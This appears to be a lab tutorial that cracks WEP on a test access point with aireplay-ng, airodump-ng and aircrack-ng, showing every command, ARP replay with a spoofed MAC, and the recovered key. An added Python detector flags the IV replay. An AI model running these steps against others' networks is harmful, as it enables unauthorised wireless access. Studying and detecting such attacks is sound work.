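Use aireplay-ng to test whether the wireless LAN card supports injection.
First, switch the interface to the same channel as the target wireless AP.
The test has succeeded when the message "Injection is working!" appears.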
root@bt:~# iwconfig mon0 channel 6
root@bt:~# aireplay-ng -9 -e "Wifitest" -a 00:08:9F:64:DD:3C mon0 --ignore-negative-one
09:40:27 Waiting for beacon frame (BSSID: 00:08:9F:64:DD:3C) on channel 6
09:40:27 Trying broadcast probe requests...
09:40:27 Injection is working!
09:40:29 Found 1 AP
09:40:29 Trying directed probe requests...
09:40:29 00:08:9F:64:DD:3C - channel: 6 - 'Wifitest'
09:40:30 Ping (min/avg/max): 1.513ms/15.141ms/41.060ms Power: -124.97
09:40:30 30/30: 100%
Sniff on the same channel as the target wireless AP (channel 6).
root@bt:~# airodump-ng --bssid 00:08:9F:64:DD:3C mon0 -c 6 -w wep

 CH 6 ][ Elapsed: 52 s ][ 2016-01-07 09:40

 BSSID              PWR  RXQ  Beacons  #Data, #/s  CH  MB   ENC  CIPHER  AUTH  E
 00:08:9F:64:DD:3C  -127  85      508     177   4   6  54e  WEP  WEP     OPN   W

 BSSID              STATION            PWR  Rate    Lost  Frames  Probe
 00:08:9F:64:DD:3C  00:26:66:07:17:74    0  0 - 1     40     150
 00:08:9F:64:DD:3C  DC:86:D8:24:02:0F  -32  54e-24  4603     288
Provoke data packets from a device connected to the target wireless AP in order to collect data.
Open another terminal window and send data packets with aireplay-ng.
root@bt:~# aireplay-ng -3 -b 00:08:9F:64:DD:3C -h DC:86:D8:24:02:0F mon0 --ignore-negative-one
The interface MAC (00:26:66:07:17:74) doesn't match the specified MAC (-h).
        ifconfig mon0 hw ether DC:86:D8:24:02:0F
10:04:36 Waiting for beacon frame (BSSID: 00:08:9F:64:DD:3C) on channel 6
Saving ARP requests in replay_arp-0107-100436.cap
You should also start airodump-ng to capture replies.
Read 2492 packets (got 23 ARP requests and 142 ACKs), sent 16 packets... (489 pps
Read 2809 packets (got 73 ARP requests and 226 ACKs), sent 66 packets... (496 pps
Read 3086 packets (got 121 ARP requests and 289 ACKs), sent 117 packets... (502 p
Read 3362 packets (got 165 ARP requests and 356 ACKs), sent 167 packets... (501 p
Read 3587 packets (got 208 ARP requests and 416 ACKs), sent 216 packets... (498 p
Read 3775 packets (got 254 ARP requests and 471 ACKs), sent 266 packets... (498 p
Read 3991 packets (got 295 ARP requests and 533 ACKs), sent 317 packets...
Open another terminal window and extract the password from the .cap file.
Cracking becomes possible once roughly 30,000 IVs have been collected.
root@bt:~# aircrack-ng wep-01.cap

 Aircrack-ng 1.1 r2178

 [00:00:47] Tested 86447 keys (got 4805 IVs)

 KB  depth   byte(vote)
  0   0/ 34  31(9728) 4D(9728) 94(9472) BB(9216) 9D(8960)
  1   0/  1  32(11008) 2A(8448) 33(8448) 42(8448) 2C(8192)
  2  17/ 82  33(7936) 65(7936) 90(7936) BC(7680) FC(7680)
  3  22/ 32  12(7680) 01(7424) 27(7424) 2D(7424) 44(7424)
  4   0/  1  35(11264) 72(9216) B2(8960) 57(8704) 04(8192)

 KEY FOUND! [ 31:32:33:34:35 ] (ASCII: 12345 )
 Decrypted correctly: 100%
The password is 12345 ^^
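From the monitoring side, the ARP request replay in the aireplay-ng -3 step stands out because one transmitter resends the same captured frame, and therefore the same WEP IV, hundreds of times per second. The following detector is an added example, not part of the original post; the record layout, MAC addresses, IV values and thresholds are constructed assumptions.

```python
from collections import Counter, defaultdict

BSSID = "02:00:00:00:00:aa"     # constructed AP address
CLIENT = "02:00:00:00:00:01"    # constructed normal station
REPLAYER = "02:00:00:00:00:02"  # constructed station replaying one frame


def make_sample_frames():
    """Constructed records: (time_ms, transmitter, bssid, wep_iv_hex)."""
    frames = []
    # Normal traffic: 20 frames/s, a fresh IV on every frame.
    for i in range(40):
        frames.append((i * 50, CLIENT, BSSID, f"{i:06x}"))
    # Replay: one captured frame resent every 2 ms, so the IV never changes.
    for i in range(1000):
        frames.append((i * 2, REPLAYER, BSSID, "1f2e3d"))
    return frames


def detect_iv_replay(frames, window_ms=1000, min_repeats=100):
    """Flag (transmitter, bssid, iv) tuples repeated >= min_repeats times
    inside one fixed window. Returns {tuple: peak count in any window}."""
    windows = defaultdict(Counter)
    for time_ms, tx, bssid, iv in frames:
        windows[time_ms // window_ms][(tx, bssid, iv)] += 1
    alerts = {}
    for counts in windows.values():
        for key, n in counts.items():
            if n >= min_repeats:
                alerts[key] = max(alerts.get(key, 0), n)
    return alerts


if __name__ == "__main__":
    for (tx, bssid, iv), peak in detect_iv_replay(make_sample_frames()).items():
        print(f"possible ARP replay: {tx} -> {bssid}, IV {iv} x{peak} in 1 s")
```

Any hit also means the network is still running WEP, so the durable fix is moving the AP to WPA2 or WPA3 rather than tuning the threshold.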